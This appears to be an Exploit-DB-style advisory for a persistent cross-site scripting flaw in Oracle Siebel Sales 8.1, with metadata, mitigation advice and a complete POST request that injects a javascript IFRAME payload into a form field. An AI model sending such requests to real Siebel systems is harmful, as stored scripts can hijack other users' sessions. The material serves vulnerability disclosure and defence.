Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting

vendor:

Siebel Sales

by:

omurugur

7.5

CVSS

HIGH

Persistent Cross-Site Scripting

CWE

Product Name: Siebel Sales

Affected Version From: Oracle Siebel Sales 8.1

Affected Version To: Oracle Siebel Sales 8.1

Patch Exists: NO

Related CWE: N/A

CPE: a:oracle:siebel_sales:8.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2019

Oracle Siebel Sales 8.1 – Persistent Cross-Site Scripting

Oracle Siebel Sales 8.1 is vulnerable to persistent cross-site scripting. An attacker can inject malicious JavaScript code into the application by sending a specially crafted POST request to the vulnerable application. This malicious code will be executed in the browser of the victim when the application is accessed.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application. Additionally, the application should be configured to use a Content Security Policy (CSP) to prevent malicious code from being executed in the browser.

Source

Exploit-DB raw data:

# Exploit Title : Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting
# Exploit Author : omurugur
# Software link: https://www.oracle.com/tr/applications/siebel/
# Effective version : Oracle Siebel Sales 8.1
# CVE: N/A

# Examples Request;

POST /salesADMIN_trk/start.swe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64;
Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729;
.NET CLR 3.5.30729)
Host: X.X.X.X
Content-Length: 550
Pragma: no-cache
Cookie: SWEUAID=23; _sn=**-yVfB7JyKox4txS.fQJdh6us-fIdUQaQW0.oxIhK
Connection: close

s_1_1_26_0=&SWEVI=&SWERowId=1-5VWLXT4&SWEC=39&s_1_1_28_0=&SWEMethod=PostChanges&s_1_1_18_0=12/9/2019&SWEPOC=Account&SWEReqRowId=1&SWERPC=1&s_1_1_90_0=N&s_1_1_71_0=&s_1_1_72_0=&s_1_1_83_0=<IFRAME
SRC="javascript:alert('XSS');"></IFRAME>&SWEApplet=Revenue%20Analysis%20Form%20Applet&SWEActiveApplet=Revenue%20Analysis%20Form%20Applet&s_1_1_51_0=%240.00&SWEView=Revenue%20Analysis%20View&SWECmd=InvokeMethod&s_1_1_65_0=&s_1_1_21_0=%240.00&s_1_1_55_0=SADMIN&SWETS=1575878518105&SWEActiveView=Revenue%20Analysis%20View&s_1_1_89_0=&s_1_1_78_0=%240.00&SWEP=&s_1_1_36_0=N&s_1_1_14_0=0.000000&SWERowIds=